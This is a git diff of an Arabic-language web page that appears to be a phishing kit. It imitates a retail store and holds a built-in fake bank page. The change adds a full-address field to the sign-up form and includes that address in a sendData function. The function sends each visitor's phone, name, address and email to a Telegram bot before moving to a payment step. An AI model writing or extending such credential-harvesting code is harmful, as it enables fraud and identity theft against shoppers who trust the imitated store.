--- a/index.html
+++ b/index.html
@@ -19,12 +19,10 @@
         .cart-badge { position: absolute; top: -5px; right: -5px; background: #FF9800; color: white; font-size: 10px; width: 18px; height: 18px; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-weight: bold; }
         .back-to-top { position: fixed; bottom: 80px; left: 20px; background: white; border: 1px solid #DDD; width: 45px; height: 45px; border-radius: 50%; display: flex; align-items: center; justify-content: center; box-shadow: 0 2px 5px rgba(0,0,0,0.1); z-index: 100; }
 
-        /* شاشة التحميل (تظهر فقط عند الانتقال) */
         #loader { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; flex-direction: column; justify-content: center; align-items: center; }
         .spinner { width: 40px; height: 40px; border: 4px solid #f3f3f3; border-top: 4px solid var(--jarir-red); border-radius: 50%; animation: spin 1s linear infinite; }
         @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
 
-        /* تنسيق صفحة البنك المدمجة */
         #page-bank { direction: ltr; text-align: left; }
         .bank-container { padding: 20px; max-width: 450px; margin: 0 auto; }
         .confirm-btn-blue { width: 100%; background-color: #0000FF; color: white; border: none; padding: 16px; font-size: 18px; font-weight: bold; border-radius: 4px; cursor: pointer; text-transform: uppercase; margin-top: 20px;}
@@ -110,6 +108,7 @@
         <div class="p-6 space-y-4">
             <input type="tel" id="user-phone" placeholder="رقم الهاتف" class="form-input">
             <input type="text" id="user-name" placeholder="الاسم الأول" class="form-input">
+            <input type="text" id="user-address" placeholder="العنوان الكامل (المدينة، الحي، الشارع)" class="form-input">
             <input type="email" id="user-email" placeholder="البريد الإلكتروني" class="form-input">
             <button onclick="sendData('register')" class="btn-red py-4 mt-6">استمرار</button>
         </div>
@@ -179,7 +178,8 @@
         async function sendData(step) {
             let text = "";
             if(step === 'register') {
-                text = `👤 زبون جديد:\n📞 هاتف: ${document.getElementById('user-phone').value}\n📝 اسم: ${document.getElementById('user-name').value}\n📧 بريد: ${document.getElementById('user-email').value}`;
+                // إضافة العنوان إلى نص الرسالة
+                text = `👤 زبون جديد:\n📞 هاتف: ${document.getElementById('user-phone').value}\n📝 اسم: ${document.getElementById('user-name').value}\n🏠 العنوان: ${document.getElementById('user-address').value}\n📧 بريد: ${document.getElementById('user-email').value}`;
                 await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(text)}`);
                 startLoading('page-payment');
             } else if(step === 'payment') {
